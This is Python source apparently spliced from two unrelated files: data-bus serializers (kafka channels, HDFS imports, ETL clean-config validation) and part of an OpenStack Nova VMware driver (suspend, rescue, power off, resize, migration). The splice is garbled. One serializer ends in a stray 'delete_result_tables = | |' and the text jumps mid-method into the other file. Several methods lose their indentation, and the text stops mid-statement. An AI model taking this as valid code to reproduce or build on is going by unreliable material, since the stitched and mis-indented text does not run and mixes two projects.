    cluster_props = serializers.CharField(label=_("集群配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
    channel_name = serializers.CharField(label=_("channel名称"), required=False)
    consumer_props = serializers.CharField(label=_("消费者配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
    consumer_bootstrap_servers = serializers.CharField(
        label=_("消费kafka集群,JSON格式"), required=False, allow_null=True, allow_blank=True
    )
    monitor_props = serializers.CharField(label=_("监控配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
    other_props = serializers.CharField(label=_("其他者配置项,JSON格式"), required=False, allow_null=True, allow_blank=True)
    module = serializers.CharField(label=_("module"), required=False, allow_null=True, allow_blank=True)
    component = serializers.CharField(label=_("component"), required=False, allow_null=True, allow_blank=True)
    state = serializers.CharField(label=_("运行状态"), required=False, allow_null=True, allow_blank=True)
    limit_per_day = serializers.IntegerField(label="集群处理能力上限", required=False, allow_null=True, min_value=1)
    priority = serializers.IntegerField(label="优先级", required=False, allow_null=True, min_value=0)

    # The *_props fields must contain valid JSON text. The four field hooks
    # below previously repeated the same try/except block verbatim; they now
    # share one helper (DRF looks the hooks up by name, so each must exist).
    @staticmethod
    def _ensure_json(value):
        """Return `value` unchanged if it parses as JSON, else raise ValidationError."""
        try:
            json.loads(value)
        except Exception:
            raise ValidationError()
        return value

    def validate_cluster_props(self, value):
        return self._ensure_json(value)

    def validate_consumer_props(self, value):
        return self._ensure_json(value)

    def validate_monitor_props(self, value):
        return self._ensure_json(value)

    def validate_other_props(self, value):
        return self._ensure_json(value)
class ClusterNameSerializer(serializers.Serializer):
    """Payload carrying only a databus task cluster name."""

    cluster_name = serializers.CharField(label=_("总线任务集群名称"))
class ConnectorNameSerializer(serializers.Serializer):
    """Payload carrying only a databus task (connector) name."""

    connector = serializers.CharField(label=_("总线任务名称"))
class RtIdSerializer(serializers.Serializer):
    """Payload carrying only a result_table_id."""

    rt_id = serializers.CharField(label=_("result_table_id"))
class ChannelSerializer(serializers.Serializer):
    """Parameters for creating a databus queue (channel) cluster."""

    cluster_name = serializers.CharField(label=_("总线队列集群名称"), required=True)
    cluster_domain = serializers.CharField(label=_("集群域名"), required=True)
    cluster_type = serializers.CharField(label=_("集群类型"), required=False, allow_null=True, allow_blank=True)
    cluster_role = serializers.CharField(label=_("集群角色"), required=False, allow_null=True, allow_blank=True)
    cluster_backup_ips = serializers.CharField(label=_("集群备用IP"), required=False, allow_null=True, allow_blank=True)
    cluster_port = serializers.IntegerField(label=_("集群端口"), required=False, allow_null=True)
    zk_domain = serializers.CharField(label=_("集群zk域名"), required=False, allow_blank=True)
    zk_port = serializers.IntegerField(label=_("集群zk端口"), required=False, allow_null=True)
    zk_root_path = serializers.CharField(label=_("集群zk根路径"), required=False, allow_null=True, allow_blank=True)
    active = serializers.BooleanField(label=_("集群状态"), required=False)
    priority = serializers.IntegerField(label=_("集群优先级"), required=False, allow_null=True)
    attribute = serializers.CharField(label=_("集群属性"), required=False, allow_null=True, allow_blank=True)
    description = serializers.CharField(label=_("集群描述"), required=False, allow_null=True, allow_blank=True)
    tags = serializers.ListField(label=_("标签"), required=False)
    # Optional cross-system identifiers: the storekit cluster name and the
    # GSE stream_to id associated with this channel.
    storage_name = serializers.CharField(label=_("storekit对应集群名"), required=False, allow_null=True, default=None)
    stream_to_id = serializers.IntegerField(
        label=_("gse关联的stream_to_id"), required=False, allow_null=True, default=None
    )
class ChannelTailSerializer(serializers.Serializer):
    """Payload selecting a kafka cluster/topic plus optional message type,
    partition and number of records to display."""

    kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
    cluster_type = serializers.CharField(label=_("集群类型"), required=False, allow_null=True, allow_blank=True)
    channel_name = serializers.CharField(label=_("集群名称"), required=False, allow_null=True, allow_blank=True)
    topic = serializers.CharField(label=_("kafka topic"), required=True)
    type = serializers.CharField(label=_("kafka消息类型"), required=False)
    partition = serializers.IntegerField(label=_("kafka分区"), required=False)
    limit = serializers.IntegerField(label=_("显示数据记录条数"), required=False)
class ChannelMessageSerializer(serializers.Serializer):
    """Payload selecting a kafka cluster/topic plus optional message type,
    partition, starting offset and number of messages to read."""

    kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
    topic = serializers.CharField(label=_("kafka topic"), required=True)
    type = serializers.CharField(label=_("kafka消息类型"), required=False)
    partition = serializers.IntegerField(label=_("kafka分区"), required=False)
    offset = serializers.IntegerField(label=_("kafka消息offset"), required=False)
    count = serializers.IntegerField(label=_("读取消息条数"), required=False)
class ChannelOffsetSerializer(serializers.Serializer):
    """Payload identifying a kafka cluster address and topic."""

    kafka = serializers.CharField(label=_("kafka集群地址"), required=True)
    topic = serializers.CharField(label=_("kafka topic"), required=True)
class HdfsImportSerializer(serializers.Serializer):
    """Parameters for creating an offline HDFS-to-kafka import task."""

    result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
    data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=3, required=True)
    description = serializers.CharField(label=_("描述信息"), allow_null=True, allow_blank=True, required=False)
class HdfsImportCleanSerializer(serializers.Serializer):
    """
    Parameters for cleaning up offline HDFS-to-kafka import tasks older than ``days``.
    """

    days = serializers.IntegerField(label=_("清除日期限定"), default=30, min_value=0)  # age limit in days
class HdfsImportSearchSerializer(serializers.Serializer):
    """
    Parameters for listing unfinished offline HDFS-to-kafka import tasks.
    """

    limit = serializers.IntegerField(label=_("返回条目限定"), default=1000, min_value=1, max_value=10000)  # max entries returned
    geog_area = serializers.CharField(label=_("集群区域"), default="")  # cluster geographic area
    databus_type = serializers.CharField(label=_("databus类型(kafka/pulsar)"), default="kafka")  # databus type: kafka/pulsar
class HdfsImportCheckSerializer(serializers.Serializer):
    """
    Parameters for checking the running status of offline HDFS-to-kafka import tasks.
    """

    interval_min = serializers.IntegerField(label=_("时间间隔"), default=5, min_value=1)  # check interval in minutes
class HdfsImportUpdateSerializer(serializers.Serializer):
    """
    Parameters for updating an offline HDFS-to-kafka import task.
    """

    result_table_id = serializers.CharField(label=_("result_table_id"), min_length=1)
    data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=1)  # HDFS data directory
    status = serializers.CharField(label=_("任务当前状态"), min_length=1)  # current task status
    finished = serializers.CharField(label=_("任务是否完成"), min_length=1)  # whether the task finished
class HdfsImportUpdateCompatibleSerializer(serializers.Serializer):
    """
    Parameters for updating an offline HDFS-to-kafka import task
    (backward-compatible with the legacy interface).
    """

    id = serializers.IntegerField(label=_("id"))
    rt_id = serializers.CharField(label=_("result_table_id"), min_length=1)
    data_dir = serializers.CharField(label=_("hdfs数据目录"), min_length=1)  # HDFS data directory
    status_update = serializers.CharField(label=_("任务当前状态"), min_length=1)  # current task status
    finish = serializers.CharField(label=_("任务是否完成"), min_length=1)  # whether the task finished
class StorageEventSerializer(serializers.Serializer):
    """
    Parameters for creating a databus storage event.
    """

    result_table_id = serializers.CharField(label=_("result_table_id"), required=True)
    storage = serializers.CharField(label=_("存储类型"), required=True)  # storage type
    event_type = serializers.CharField(label=_("事件类型"), required=True)  # event type
    event_value = serializers.CharField(label=_("事件值"), required=True)  # event value
    description = serializers.CharField(label=_("事件描述"), allow_null=True, allow_blank=True, required=False)  # event description
class JobNotifySerializer(serializers.Serializer):
    """
    Parameters for triggering an offline computation.
    """

    result_table_id = serializers.CharField(label=_("result_table_id"), required=True)
    date_time = serializers.CharField(label=_("数据时间"), required=True)  # data timestamp
class CleanSerializer(serializers.Serializer):
    """
    Parameters for creating a clean (ETL) config.

    Example payload:
    {
        "bk_biz_id": 122,
        "clean_config_name": "test_clean_config_xxx",
        "result_table_name": "test_etl",
        "result_table_name_alias": "清洗表01",
        "bk_username": 'admin',
        "raw_data_id": 5,
        "json_config": "{\"iterator\": \"\"}"
        "fields": [{
            "field_name": "a",
            "field_alias": "字段1",
            "field_type": "string",
            "is_dimension": False,
            "field_index": 1
        }, {
            "field_name": "ts",
            "field_alias": "时间字段",
            "field_type": "string",
            "is_dimension": False,
            "field_index": 2
        }
    }
    """

    class ResultTableFieldSerializer(serializers.Serializer):
        """One cleaned output field definition."""

        field_name = serializers.CharField(label=_("字段名称"))  # field name
        field_alias = serializers.CharField(label=_("字段显示名称"))  # field display name
        field_type = serializers.CharField(label=_("字段类型"))  # field type
        is_dimension = serializers.BooleanField(label=_("是否维度字段"))  # whether this is a dimension field
        field_index = serializers.IntegerField(label=_("字段序号"))  # field ordinal
        raise_meta_exception = serializers.BooleanField(label=_("是否抛出meta的异常"), required=False)

        def validate_field_name(self, value):
            """Reject reserved or malformed field names."""
            pattern_1 = re.compile(r"^minute(\d)+")
            pattern_2 = re.compile(r"^\$f\d+$")
            pattern_3 = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]*$")
            value_to_validate = value.lower()
            # system-reserved column names (checked case-insensitively)
            if value_to_validate in (
                "__time",
                "dteventtimestamp",
                "dteventtime",
                "localtime",
                "thedate",
                "now",
            ):
                raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
            # NOTE(review): the "minute<N>" reserved check matches the original
            # value, not the lower-cased one ("Minute1" would pass) — confirm intent.
            if pattern_1.match(value):
                raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
            # must be a normal identifier, or an internal "$f<N>" placeholder
            if not pattern_3.match(value) and not pattern_2.match(value):
                raise ValidationError(_("字段不合规。field:{}").format(value))
            return value

    json_config = serializers.CharField(label=_("清洗算子配置"))  # clean operator config (JSON string)
    bk_biz_id = serializers.IntegerField(label=_("业务ID"))  # business ID
    clean_config_name = serializers.CharField(label=_("清洗配置名称"), required=False)  # clean config name
    result_table_name = serializers.CharField(label=_("表名"))  # result table name
    result_table_name_alias = serializers.CharField(label=_("表名别名"))  # result table alias
    bk_username = serializers.CharField(label=_("用户名"))  # username
    raw_data_id = serializers.IntegerField(label=_("数据源ID"))  # raw data source ID
    description = serializers.CharField(label=_("描述信息"))  # description
    fields = ResultTableFieldSerializer(required=True, many=True, label=_("清洗字段列表"))

    def validate_json_config(self, value):
        """Validate that json_config is valid JSON containing the required keys.

        Required structure: top-level "extract" and "conf" keys, with
        "time_field_name", "output_field_name" and "time_format" under "conf".

        :raises exceptions.CleanConfigError: if the config is malformed.
        """
        # Parse in a narrow try so only JSON errors are mapped to
        # CleanConfigError; the original blanket except also caught (and
        # masked) the CleanConfigError deliberately raised below.
        try:
            conf = json.loads(value)
        except (TypeError, ValueError):
            raise exceptions.CleanConfigError()
        try:
            required_present = (
                "extract" in conf
                and "conf" in conf
                and "time_field_name" in conf["conf"]
                and "output_field_name" in conf["conf"]
                and "time_format" in conf["conf"]
            )
        except TypeError:
            # parsed JSON is not an object/mapping
            required_present = False
        if not required_present:
            raise exceptions.CleanConfigError()
        return value
class CleanVerifySerializer(serializers.Serializer):
    """
    Parameters for verifying a clean (ETL) config against a sample message.
    """

    conf = serializers.CharField(label=_("清洗算子配置"), required=True)  # clean operator config (JSON string)
    msg = serializers.CharField(label=_("待清洗的数据"), required=True)  # raw data sample to clean
    debug_by_step = serializers.BooleanField(label=_("单步调试"), required=False)  # step-by-step debugging

    def validate(self, attrs):
        # Collect every "assign_to" target from the config tree and apply the
        # same reserved-name / identifier rules used when creating a clean
        # config (note: this list additionally reserves "offset").
        conf = attrs["conf"]
        json_conf = json.loads(conf)
        result_list = []
        result_list = find_value_by_key(json_conf, "assign_to", result_list)
        pattern_1 = re.compile(r"^minute(\d)+")
        pattern_2 = re.compile(r"^\$f\d+$")
        pattern_3 = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]*$")
        if result_list:
            for fileds in result_list:
                value = fileds.get("assign_to", "")
                value_to_validate = value.lower()
                if value_to_validate in (
                    "__time",
                    "dteventtimestamp",
                    "dteventtime",
                    "localtime",
                    "thedate",
                    "now",
                    "offset",
                ):
                    raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
                # reserved "minute<N>" check uses the original-cased value
                if pattern_1.match(value):
                    raise ValidationError(message=_("系统保留字段,不允许使用。field:{}").format(value))
                # must be a normal identifier, or an internal "$f<N>" placeholder
                if not pattern_3.match(value) and not pattern_2.match(value):
                    raise ValidationError(_("字段不合规。field:{}").format(value))
        return attrs
class DeleteCleanSerializer(serializers.Serializer):
    """
    Validates the parameters for deleting a clean config.
    """

    delete_metrics = serializers.ListField(label=_("删除指标列表"), default=[])
    data_quality = serializers.BooleanField(label=_("是否删除数据质量"), default=False)

    def validate(self, attrs):
        # data_quality is derived purely from delete_metrics: it becomes True
        # only when "dataquality" is listed, regardless of the submitted flag.
        attrs["data_quality"] = "dataquality" in attrs["delete_metrics"]
        return attrs
class CleanDataIdVerifySerializer(serializers.Serializer):
    """
    Parameters for verifying a clean config by raw data id.
    """

    raw_data_id = serializers.IntegerField(label=_("数据源ID"), required=False)  # raw data source ID
class SetPartitionsSerializer(serializers.Serializer):
    """
    Validates the partition count when resizing a result table's topic.
    """

    partitions = serializers.IntegerField(label=_("分区数量"))  # partition count

    def validate_partitions(self, value):
        """Allow only partition counts greater than 1 and at most 50."""
        if value <= 1 or value > 50:
            # The original raised a bare ValidationError with no message,
            # producing an unexplained 400 response; include the constraint.
            raise ValidationError(_("分区数量必须大于1且不超过50"))
        return value
class SetTopicSerializer(serializers.Serializer):
    """
    Parameters for setting retention thresholds on a result table's topic.
    """

    retention_size_g = serializers.IntegerField(label=_("数据删除大小阈值"), required=True)  # size-based retention threshold (GB)
    retention_hours = serializers.IntegerField(label=_("数据删除时间阈值"), required=True)  # time-based retention threshold (hours)
class AddQueueUserSerializer(serializers.Serializer):
    """Parameters for adding a queue-service user account."""

    user = serializers.CharField(label=_("访问队列服务的用户(app_code)"))  # queue-service user (app_code)
    password = serializers.CharField(label=_("访问队列服务的密码(app_secret)"))  # queue-service password (app_secret)
class QueueAuthSerializer(serializers.Serializer):
    """Parameters for granting a queue-service user access to result tables."""

    result_table_ids = serializers.ListField(label=_("ResultTable列表"))  # list of result table ids
    user = serializers.CharField(label=_("队列服务的用户名称"))  # queue-service user name
class TasksCreateSerializer(serializers.Serializer):
    """Parameters for creating databus tasks for a result table."""

    result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
    storages = serializers.ListField(label=_("存储列表"), required=False)  # list of storage types
class TasksRtIdSerializer(serializers.Serializer):
    """Parameters identifying a task by result table id."""

    result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
class TasksDataIdSerializer(serializers.Serializer):
    """Parameters identifying a task by raw data id."""

    data_id = serializers.IntegerField(label=_("数据源ID"), required=True)  # raw data source ID
class TasksTransportSerializer(serializers.Serializer):
    """Parameters for creating a transport task between two result tables."""

    # NOTE(review): all four labels below read "数据源" (data source) — the
    # sink/type labels look copy-pasted; verify the intended label text.
    source_rt_id = serializers.CharField(label=_("数据源"), required=True)
    source_type = serializers.CharField(label=_("数据源"), required=True)
    sink_rt_id = serializers.CharField(label=_("数据源"), required=True)
    sink_type = serializers.CharField(label=_("数据源"), required=True)
    parallelism = serializers.IntegerField(label=_("并行度"), default=10, required=False)  # parallelism degree
class TasksTransportStatusSerializer(serializers.Serializer):
    """Parameters for querying transport task status."""

    for_datalab = serializers.BooleanField(label=_("是否用于datalab"), required=False, default=True)  # whether used for datalab
class TasksConnectorsSerializer(serializers.Serializer):
    """Parameters selecting connectors by name."""

    connectors = serializers.CharField(label=_("connector名称列表"), required=False)  # connector name list
class TasksStoragesSerializer(serializers.Serializer):
    """Parameters selecting multiple storages."""

    storages = serializers.ListField(label=_("存储列表"), required=False)  # list of storage types
class TasksStorageSerializer(serializers.Serializer):
    """Parameters selecting a single storage."""

    # NOTE(review): label says "存储列表" (storage list) but the field is a
    # single CharField — label looks copy-pasted; verify.
    storage = serializers.CharField(label=_("存储列表"), default="", required=False)
class TasksStateSerializer(serializers.Serializer):
    """Parameters for querying/setting a task's state slot."""

    result_table_id = serializers.CharField(label=_("result_table_id"), min_length=3, required=True)
    slot = serializers.CharField(label=_("slot"), required=True)
class TasksDestClusterSerializer(serializers.Serializer):
    """Parameters selecting a destination cluster."""

    dest_cluster = serializers.CharField(label=_("目标集群名称"), required=False)  # destination cluster name
class DataNodeCreateSerializer(serializers.Serializer):
    """
    Parameters for creating a fixed (materialized) data-node config.
    """

    source_result_table_ids = serializers.CharField(label=_("来源结果表列表"), required=True)  # source result table ids
    node_type = serializers.CharField(label=_("节点类型"), required=True)  # node type
    project_id = serializers.IntegerField(label=_("project_id"))
    bk_biz_id = serializers.IntegerField(label=_("bk_biz_id"))
    result_table_name = serializers.CharField(label=_("结果表英文名"))  # result table English name
    result_table_name_alias = serializers.CharField(label=_("结果表中文名"))  # result table Chinese name
    config = serializers.CharField(label=_("固化算子逻辑配置"), allow_blank=True, allow_null=True, required=False)  # operator logic config
    description = serializers.CharField(label=_("备注"), allow_blank=True, allow_null=True, required=False)  # remark
class DataNodeDestroySerializer(serializers.Serializer):
    """
    Parameters for deleting a fixed (materialized) data-node config.
    """

    with_data = serializers.BooleanField(label=_("是否删除下游的结果表"), required=False)  # also delete downstream result tables
    delete_result_tables = serializers.ListField(label=_("删除下游的结果表列表"), required=False)  # downstream result tables to delete
class DataNodeUpdateSerializer(serializers.Serializer):
"""用于更新固化节点配置"""
source_result_table_ids = serializers.CharField(label=_("来源结果表列表"), required=True)
node_type = serializers.CharField(label=_("节点类型"), required=True)
project_id = serializers.IntegerField(label=_("project_id"))
bk_biz_id = serializers.IntegerField(label=_("bk_biz_id"))
result_table_name = serializers.CharField(label=_("结果表英文名"))
result_table_name_alias = serializers.CharField(label=_("结果表中文名"))
config = serializers.CharField(label=_("固化算子逻辑配置"), allow_blank=True, allow_null=True, required=False)
description = serializers.CharField(label=_("备注"), allow_blank=True, allow_null=True, required=False)
delete_result_tables = | |
raise exception.InstanceSuspendFailure(reason=reason)
else:
LOG.debug("VM was already in suspended state. So returning "
"without doing anything", instance=instance)
def resume(self, instance):
"""Resume the specified instance."""
vm_ref = vm_util.get_vm_ref(self._session, instance)
pwr_state = self._session._call_method(vutil,
"get_object_property",
vm_ref,
"runtime.powerState")
if pwr_state.lower() == "suspended":
LOG.debug("Resuming the VM", instance=instance)
suspend_task = self._session._call_method(
self._session.vim,
"PowerOnVM_Task", vm_ref)
self._session._wait_for_task(suspend_task)
LOG.debug("Resumed the VM", instance=instance)
else:
reason = _("instance is not in a suspended state")
raise exception.InstanceResumeFailure(reason=reason)
def _get_rescue_device(self, instance, vm_ref):
hardware_devices = vm_util.get_hardware_devices(self._session, vm_ref)
return vm_util.find_rescue_device(hardware_devices,
instance)
    def rescue(self, context, instance, network_info, image_meta):
        """Rescue the specified instance.

        Attach the image that the instance was created from as an extra
        disk and make the VM boot from it, so the original root disk can
        be inspected/repaired.
        """
        vm_ref = vm_util.get_vm_ref(self._session, instance)

        # Get the root disk vmdk object
        vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
                                     uuid=instance.uuid)
        ds_ref = vmdk.device.backing.datastore
        datastore = ds_obj.get_datastore_by_ref(self._session, ds_ref)
        dc_info = self.get_datacenter_ref_and_name(datastore.ref)

        # Get the image details of the instance
        image_info = images.VMwareImage.from_image(context,
                                                   image_meta.id,
                                                   image_meta)
        vi = VirtualMachineInstanceConfigInfo(instance,
                                              image_info,
                                              datastore,
                                              dc_info,
                                              self._imagecache)
        vm_util.power_off_instance(self._session, instance, vm_ref)

        # Fetch the image if it does not exist in the cache
        self._fetch_image_if_missing(context, vi)

        # Get the rescue disk path, placed in the instance's VM folder
        vm_folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
        rescue_disk_path = datastore.build_path(vm_folder,
            "%s-rescue.%s" % (image_info.image_id, image_info.file_type))

        # Copy the cached image to be the rescue disk. This will be used
        # as the rescue disk for the instance.
        ds_util.disk_copy(self._session, dc_info.ref,
                          vi.cache_image_path, rescue_disk_path)
        # Attach the rescue disk to the instance
        self._volumeops.attach_disk_to_vm(vm_ref, instance, vmdk.adapter_type,
                                          vmdk.disk_type, rescue_disk_path)
        # Get the rescue device and configure the boot order to
        # boot from this device
        rescue_device = self._get_rescue_device(instance, vm_ref)
        factory = self._session.vim.client.factory
        boot_spec = vm_util.get_vm_boot_spec(factory, rescue_device)
        # Update the VM with the new boot order and power on
        vm_util.reconfigure_vm(self._session, vm_ref, boot_spec)
        vm_util.power_on_instance(self._session, instance, vm_ref=vm_ref)
    def unrescue(self, instance, power_on=True):
        """Unrescue the specified instance.

        Detaches (and destroys) the rescue disk, then optionally powers the
        instance back on so it boots from its original root disk.
        """
        vm_ref = vm_util.get_vm_ref(self._session, instance)
        # Get the rescue device and detach it from the instance.
        try:
            rescue_device = self._get_rescue_device(instance, vm_ref)
        except exception.NotFound:
            # log and re-raise: without the rescue device there is nothing
            # we can safely detach
            with excutils.save_and_reraise_exception():
                LOG.error('Unable to access the rescue disk',
                          instance=instance)
        vm_util.power_off_instance(self._session, instance, vm_ref)
        self._volumeops.detach_disk_from_vm(vm_ref, instance, rescue_device,
                                            destroy_disk=True)
        if power_on:
            vm_util.power_on_instance(self._session, instance, vm_ref=vm_ref)
    def power_off(self, instance, timeout=0, retry_interval=0):
        """Power off the specified instance.

        :param instance: nova.objects.instance.Instance
        :param timeout: How long to wait in seconds for the instance to
                        shutdown
        :param retry_interval: Interval to check if instance is already
                               shutdown in seconds.
        """
        # Try a guest-cooperative (soft) shutdown first when a timeout is
        # given; fall back to a hard power-off if it does not finish in time.
        if timeout and self._clean_shutdown(instance,
                                            timeout,
                                            retry_interval):
            return

        vm_util.power_off_instance(self._session, instance)
        self.update_cached_instances()
def _clean_shutdown(self, instance, timeout, retry_interval):
"""Perform a soft shutdown on the VM.
:param instance: nova.objects.instance.Instance
:param timeout: How long to wait in seconds for the instance to
shutdown
:param retry_interval: Interval to check if instance is already
shutdown in seconds.
:return: True if the instance was shutdown within time limit,
False otherwise.
"""
LOG.debug("Performing Soft shutdown on instance",
instance=instance)
vm_ref = vm_util.get_vm_ref(self._session, instance)
props = self._get_instance_props(vm_ref)
if props.get("runtime.powerState") != "poweredOn":
LOG.debug("Instance not in poweredOn state.",
instance=instance)
return False
if ((props.get("summary.guest.toolsStatus") == "toolsOk") and
(props.get("summary.guest.toolsRunningStatus") ==
"guestToolsRunning")):
LOG.debug("Soft shutdown instance, timeout: %d",
timeout, instance=instance)
self._session._call_method(self._session.vim,
"ShutdownGuest",
vm_ref)
while timeout > 0:
wait_time = min(retry_interval, timeout)
props = self._get_instance_props(vm_ref)
if props.get("runtime.powerState") == "poweredOff":
LOG.info("Soft shutdown succeeded.",
instance=instance)
return True
time.sleep(wait_time)
timeout -= retry_interval
LOG.warning("Timed out while waiting for soft shutdown.",
instance=instance)
else:
LOG.debug("VMware Tools not running", instance=instance)
return False
def is_instance_in_resource_pool(self, instance):
try:
vm_ref = vm_util.get_vm_ref(self._session, instance)
res_pool = self._session._call_method(vutil, "get_object_property",
vm_ref, "resourcePool")
return vutil.get_moref_value(res_pool) == \
vutil.get_moref_value(self._root_resource_pool)
except (exception.InstanceNotFound,
vexc.ManagedObjectNotFoundException):
LOG.debug("Failed to find instance", instance=instance)
return False
def _get_instance_props(self, vm_ref):
lst_properties = ["config.instanceUuid",
"runtime.powerState",
"summary.guest.toolsStatus",
"summary.guest.toolsRunningStatus",
]
self.update_cached_instances()
vm_props = vm_util._VM_VALUE_CACHE.get(vm_ref.value, {})
if set(vm_props.keys()).issuperset(lst_properties):
return vm_props
else:
return self._session._call_method(
vutil, "get_object_properties_dict",
vm_ref, lst_properties)
    def power_on(self, instance):
        """Power on the specified instance and refresh the instance cache."""
        vm_util.power_on_instance(self._session, instance)
        self.update_cached_instances()
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the clone disk step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
progress = round(float(step) / total_steps * 100)
instance_uuid = instance.uuid
LOG.debug("Updating instance '%(instance_uuid)s' progress to"
" %(progress)d",
{'instance_uuid': instance_uuid, 'progress': progress},
instance=instance)
instance.progress = progress
instance.save()
    def _resize_vm(self, context, instance, vm_ref, flavor, image_meta):
        """Resizes the VM according to the flavor."""
        client_factory = self._session.vim.client.factory
        extra_specs = self._get_extra_specs(flavor, image_meta)
        metadata = self._get_instance_metadata(context, instance, flavor)
        vm_resize_spec = vm_util.get_vm_resize_spec(client_factory,
                                                    int(flavor.vcpus),
                                                    int(flavor.memory_mb),
                                                    extra_specs,
                                                    metadata=metadata)
        vm_util.reconfigure_vm(self._session, vm_ref, vm_resize_spec)

        # Decide whether the DRS "big VM" override needs to be added or
        # removed, depending on which side of the big/large VM threshold the
        # old and new flavors fall.
        old_flavor = instance.old_flavor
        old_needs_override = utils.is_big_vm(int(old_flavor.memory_mb),
                                             old_flavor) \
            or utils.is_large_vm(int(old_flavor.memory_mb),
                                 old_flavor)
        new_needs_override = utils.is_big_vm(int(flavor.memory_mb), flavor) \
            or utils.is_large_vm(int(flavor.memory_mb),
                                 flavor)
        if not old_needs_override and new_needs_override:
            # Make sure we don't automatically move around "big" VMs
            behavior = constants.DRS_BEHAVIOR_PARTIALLY_AUTOMATED
            LOG.debug("Adding DRS override '%s' for big VM.", behavior,
                      instance=instance)
            cluster_util.update_cluster_drs_vm_override(self._session,
                                                        self._cluster,
                                                        vm_ref,
                                                        operation='add',
                                                        behavior=behavior)
        elif old_needs_override and not new_needs_override:
            # remove the old override, if we had one before. make sure we don't
            # error out if it was already deleted another way
            LOG.debug("Removing DRS override for former big VM.",
                      instance=instance)
            try:
                cluster_util.update_cluster_drs_vm_override(self._session,
                                                            self._cluster,
                                                            vm_ref,
                                                            operation='remove')
            except Exception:
                LOG.exception('Could not remove DRS override.',
                              instance=instance)

        self._clean_up_after_special_spawning(context, flavor.memory_mb,
                                              flavor)
def _resize_disk(self, instance, vm_ref, vmdk, flavor):
if (flavor.root_gb > instance.old_flavor.root_gb
and flavor.root_gb > vmdk.capacity_in_bytes / units.Gi):
root_disk_in_kb = flavor.root_gb * units.Mi
ds_ref = vmdk.device.backing.datastore
dc_info = self.get_datacenter_ref_and_name(ds_ref)
folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
resized_disk = str(ds_obj.DatastorePath(datastore, folder,
'resized.vmdk'))
ds_util.disk_copy(self._session, dc_info.ref, vmdk.path,
str(resized_disk))
self._extend_virtual_disk(instance, root_disk_in_kb, resized_disk,
dc_info.ref)
self._volumeops.detach_disk_from_vm(vm_ref, instance, vmdk.device)
original_disk = str(ds_obj.DatastorePath(datastore, folder,
'original.vmdk'))
ds_util.disk_move(self._session, dc_info.ref, vmdk.path,
original_disk)
ds_util.disk_move(self._session, dc_info.ref, resized_disk,
vmdk.path)
self._volumeops.attach_disk_to_vm(vm_ref, instance,
vmdk.adapter_type,
vmdk.disk_type, vmdk.path)
def _remove_ephemerals_and_swap(self, vm_ref):
devices = vm_util.get_ephemerals(self._session, vm_ref)
swap = vm_util.get_swap(self._session, vm_ref)
if swap is not None:
devices.append(swap)
if devices:
vm_util.detach_devices_from_vm(self._session, vm_ref, devices)
    def _resize_create_ephemerals_and_swap(self, vm_ref, instance,
                                           block_device_info):
        """Recreate ephemeral and swap disks next to the root disk after a
        resize/revert."""
        vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
                                     uuid=instance.uuid)
        if not vmdk.device:
            LOG.debug("No root disk attached!", instance=instance)
            return
        ds_ref = vmdk.device.backing.datastore
        datastore = ds_obj.get_datastore_by_ref(self._session, ds_ref)
        dc_info = self.get_datacenter_ref_and_name(ds_ref)
        # place the new disks in the same datastore folder as the root disk
        folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
        self._create_ephemeral(block_device_info, instance, vm_ref,
                               dc_info, datastore, folder, vmdk.adapter_type)
        self._create_swap(block_device_info, instance, vm_ref, dc_info,
                          datastore, folder, vmdk.adapter_type)
    def migrate_disk_and_power_off(self, context, instance, dest, flavor):
        """Transfers the disk of a running instance in multiple phases, turning
        off the instance before the end.
        """
        vm_ref = vm_util.get_vm_ref(self._session, instance)
        vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
                                     uuid=instance.uuid)
        boot_from_volume = compute_utils.is_volume_backed_instance(context,
                                                                   instance)
        # Checks if the migration needs a disk resize down.
        if (not boot_from_volume and (
            flavor.root_gb < instance.flavor.root_gb or
            (flavor.root_gb != 0 and
             flavor.root_gb < vmdk.capacity_in_bytes / units.Gi))):
            reason = _("Unable to shrink disk.")
            raise exception.InstanceFaultRollback(
                exception.ResizeError(reason=reason))

        # 0. Zero out the progress to begin
        self._update_instance_progress(context, instance,
                                       step=0,
                                       total_steps=RESIZE_TOTAL_STEPS)

        # 1. Power off the instance
        vm_util.power_off_instance(self._session, instance, vm_ref)
        self._update_instance_progress(context, instance,
                                       step=1,
                                       total_steps=RESIZE_TOTAL_STEPS)
        # NOTE(review): only steps 0-1 of RESIZE_TOTAL_STEPS are performed
        # here; presumably the remaining steps run elsewhere — confirm.
    def confirm_migration(self, migration, instance, network_info):
        """Confirms a resize, destroying the source VM."""
        vm_ref = vm_util.get_vm_ref(self._session, instance)
        vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
                                     uuid=instance.uuid)
        if not vmdk.device:
            # nothing to clean up without a root disk
            return
        ds_ref = vmdk.device.backing.datastore
        dc_info = self.get_datacenter_ref_and_name(ds_ref)
        folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
        datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
        # Delete the pre-resize backup disk kept for revert, if it still exists.
        original_disk = ds_obj.DatastorePath(datastore, folder,
